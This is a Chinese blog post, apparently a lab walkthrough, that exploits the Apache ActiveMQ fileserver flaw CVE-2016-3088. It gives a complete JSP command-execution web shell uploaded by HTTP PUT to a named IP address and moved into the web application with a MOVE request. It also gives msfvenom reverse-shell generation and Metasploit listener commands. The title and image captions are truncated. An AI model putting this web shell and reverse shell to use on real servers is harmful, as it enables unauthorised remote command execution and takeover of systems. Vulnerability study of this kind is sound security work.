Apache ActiveMQ 远程代码执行漏洞 (CVE-

发布时间:2020-05-29 19:13:43 作者:wx5c99daab1f230
来源:网络 阅读:988
简介:2016年4月14日,国外安全研究人员 Simon Zuckerbraun 曝光 Apache ActiveMQ Fileserver 存在多个安全漏洞,可使远程***者用恶意代码替代Web应用,在受影响系统上执行远程代码(CVE-2016-3088)。
8161端口为web控制台端口,本漏洞就出现在web控制台中。
ActiveMQ的web控制台分三个应用,admin、api和fileserver,其中admin是管理员页面,api是接口,fileserver是储存文件的接口;admin和api都需要登录后才能使用,fileserver无需登录。
fileserver是一个RESTful API接口,我们可以通过GET、PUT、DELETE等HTTP请求对其中存储的文件进行读写操作,其设计目的是为了弥补消息队列操作不能传输、存储二进制文件的缺陷,但后来发现:其使用率并不高而且文件操作容易出现漏洞。
所以,ActiveMQ在5.12.x~5.13.x版本中,已经默认关闭了fileserver这个应用(你可以conf/jetty.xml中开启之);在5.14.0版本以后,彻底删除了fileserver应用。

方法1.直接写shell
访问http://120.79.1.70:8161/fileserver 直接用bp拦截之后把post改成put 在往后面加几行

<%@ page import="java.util.*,java.io.*"%> <% %> 
<HTML><BODY> <FORM METHOD="GET" NAME="comments" ACTION="">
<INPUT TYPE="text" NAME="comment"> 
<INPUT TYPE="submit" VALUE="Send"> 
</FORM> <pre> 
<%
 if ( request.getParameter( "comment" ) != null )
 {
     out.println( "Command: " + request.getParameter( "comment" ) + "<BR>" );
     Process p        = Runtime.getRuntime().exec( request.getParameter( "comment" ) );
     OutputStream os    = p.getOutputStream();
     InputStream in        = p.getInputStream();
     DataInputStream dis    = new DataInputStream( in );
     String disr        = dis.readLine();
     while ( disr != null )
     {
         out.println( disr ); disr = dis.readLine();
     }
 }
 %>
 </pre> 
 </BODY></HTML>

如下图:chen.txt:
Apache ActiveMQ 远程代码执行漏洞 (CVE-

返回204代表成功,之后再把put改成move 后面再加一行

Destination:file:///opt/activemq/webapps/api/s.jsp

Apache ActiveMQ 远程代码执行漏洞 (CVE-
最后直接访问 后面加一个api就成功了
Apache ActiveMQ 远程代码执行漏洞 (CVE-

方法2.利用 cron 定时任务写 shell
现在kali里面生成一个***
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.199.109 LPORT=9999 r> bing.jsp
再把他上传到桌面进行打开如下图:
Apache ActiveMQ 远程代码执行漏洞 (CVE-

之后和之前一样 在第一行的后面添加一行

Destination:file:///opt/activemq/webapps/api/s.jsp

Apache ActiveMQ 远程代码执行漏洞 (CVE-

到网站上进行查看有没有
Apache ActiveMQ 远程代码执行漏洞 (CVE-

之后打开kali

use exploit/multi/handler
set payload java/jsp_shell_reverse_tcp
set lhost 192.168.199.109
set lport 9999
run 

进行监听就成功了!

推荐阅读:
  1. C语言编程输入一个5位数以内的正整数,完成以下操作
  2. 青云QingCloud 镜像仓库上线|最强 IaaS 驱动下的完整容器平台

免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。

vulhub he ct

上一篇:php 字符串截取

下一篇:怎么 查看电脑的内存信息

相关阅读

您好,登录后才能下订单哦!

密码登录
登录注册
其他方式登录
点击 登录注册 即表示同意《亿速云用户服务条款》